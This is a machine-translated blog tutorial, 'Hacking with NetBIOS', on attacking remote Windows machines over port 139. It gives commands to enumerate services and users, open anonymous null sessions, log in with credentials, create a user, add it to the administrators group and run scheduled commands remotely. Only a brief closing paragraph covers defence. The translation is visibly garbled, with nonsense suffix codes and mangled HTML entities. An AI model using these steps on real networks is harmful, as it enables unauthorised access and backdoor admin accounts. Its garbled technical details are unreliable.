使用 NetBIOS 进行黑客攻击

该网站将展示使用 NetBIOS 将尽可能多的数据获取到远程 PC 的不同方法.

第一件事是检查我们要连接的计算机是否打开了 NetBIOS 端口, 这 port 是 139; 可以使用 MSDOS 队列和此命令来完成: telnet 地址 139 如果它连接,它将打开它,如果没有,则寻找另一台 PC.

第二件最重要的事情是拥有 NetBios 表, 这将告诉我们远程计算机正在运行哪些服务,我们将使用后续命令获得的结果进行检查

名字
后缀
家伙
服务
<计算机名称>
00
工作站服务
<计算机名称>
01
Messenger 服务
<_MSBROWSE_>
01
G
主浏览器
<计算机名称>
03
Messenger 服务
<计算机名称>
06
RAS 服务器服务
<计算机名称>
1F
NetDDE 服务
<计算机名称>
20
文件服务器服务
<计算机名称>
21
RAS 客户服务
<计算机名称>
22
Exchange Interchange
<计算机名称>
23
Exchange 商店
<计算机名称>
24
Exchange 目录
<计算机名称>
30
调制解调器共享服务器服务
<计算机名称>
31
调制解调器共享客户端服务
<计算机名称>
43
短信客户端远程控制
<计算机名称>
44
SMS Admin 远程控制工具
<计算机名称>
45
短信客户端远程聊天
<计算机名称>
46
短信客户端远程传输
<计算机名称>
4C
DEC Pathworks TCPIP 服务
<计算机名称>
52
DEC Pathworks TCPIP 服务
<计算机名称>
87
Exchange MTA
<计算机名称>
6自
交易所 IMC
<计算机名称>
蜜蜂
网络监视器代理
<计算机名称>
高炉
网络监控应用程序
<用户名>
03
Messenger 服务
<域>
00
G
域名
<域>
1B
Domain Master 浏览器
<域>
1C
G
域控制器
<域>
1D
主浏览器
<域>
1和
G
浏览器服务选择
<INet~服务>
1C
G
Internet 信息服务器
<是~Computer_name>
00
Internet 信息服务器

通过这个 MSDOS 命令,我们将能够知道远程机器正在运行哪些服务: nbtstat -A 地址nbtstat -a 电脑名称. 除此之外,他还会给我们地址 苹果电脑 如果我们感兴趣.

NetBIOS
正如我们在图像中看到的,我们制作了一个 NBTSTAT 添加到 IP 或 PCNAME 中,并给出这些结果, 我们将它们与 NetBIOS 表进行比较,我们将作为您的用户获得多汁的数据, 到属于的域… 如果它是一个域控制器,我们将看到它运行的服务.

建立所谓的 Null 会话, 我们必须运行这个命令: 净使用 DIRECCIONIPIPC$ “”/或:”” . 此命令实际执行的作是使用用户向远程 PC 进行身份验证 匿名.

使用特定用户对远程计算机进行身份验证: net use ADDRESS /u:用户名 PASSWORDnet use addressipc$ /u:用户名 PASSWORDnet 使用 ADDRESSIPRESOURCE /u:用户名 PASSWORD 通过远程主机的身份验证后,您可以查看文件夹的内容,您可以执行 net view 地址 我们将通过 MSDOS 查看内容, 但你也可以这样做, 开始 > EXECUTE 和你想要的任何东西: ADDRESSIP 或 IPADDRESS 资源,并将在 Windows 资源管理器窗口中显示内容.

查看远程时间: net time 地址
查看可用域: Net View /域
查看特定域中的计算机: Net View /域:布哈拉
查看团队中的用户: Net User
查看用户的详细信息: Net User 用户名
创建用户: net 用户用户名 password /ADD (非常适合使用 AT 命令在远程 PC 上创建用户)
删除用户: net 用户用户名 /DELETE
在 PC 上查看群组: 网络组
将用户放入组: 网络组名称groupusername /ADD (非常适合将管理员分组到我们在 PC 上远程创建的用户中)
从组中删除用户: 网络组名称组用户名 /
删除

命令 , 远程运行. 使用命令 en DIRECCIONIP 我们将看到您的团队拥有的计划任务,并使用命令 en DIRECCIONIP 21:30 /互动 “MSDOS 命令在远程 PC 上运行”. 在前面的命令中, 21:30 这是我设置要执行的 MSDOS 命令的时间,用引号括起来, 所以你可以随时, 但首先要好好看看它有!

MS Windows 资源工具包工具 nltest.rar 显示特定域的域控制器, 例:
C:>nltest /dclist:bujarra.com
列出域 bujarra.com 中的 pof DCS
布加拉01

趣味系列前往程序 Nbtscan 他所做的是一个 'nbtstat’ 以令人印象深刻的速度传输整个网络。例:

C:>NBTSCAN 192.168.0.0/24
&nbsp对地址进行 NBT 名称扫描 192.168.0.0/24
&nbspIP 地址 &nbspNetBIOS 服务器 &nbsp服务器 &nbsp用户 &nbspMAC 地址
&中文—————————————————————————–
&中文(简体):192.168.0.0 &nbspSendto 失败: 无法分配请求的地址
&nbsp 192.168.0.1 &nbspBUJARRA01 <服务器> <未知> &型号 00-E0-7D-78-11-E6
&中文(简体):192.168.0.13 &nbspMARIA <服务器> &nbspMARIA &型号 00-E0-7D-76-5A-2B
&中文(简体):192.168.0.55 &nbspVICETOPC <服务器> &VICETO 00-00-f8-30-fa-23
&中文(简体):192.168.0.100 &nbspRecvfrom 失败: 对等体重置连接

保护自己 对于这种类型的攻击,我们必须关闭端口 139 在路由器上, 我们将在 XP 中启用防火墙,或者我们将删除 Microsoft 网络的文件夹和打印机共享服务 (在任何 S.O 中. Microsoft 的).


推荐文章

作者

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, 请随时与我联系, 我会尽我所能帮助你, 分享就是生活 ;) . 享受文档!!!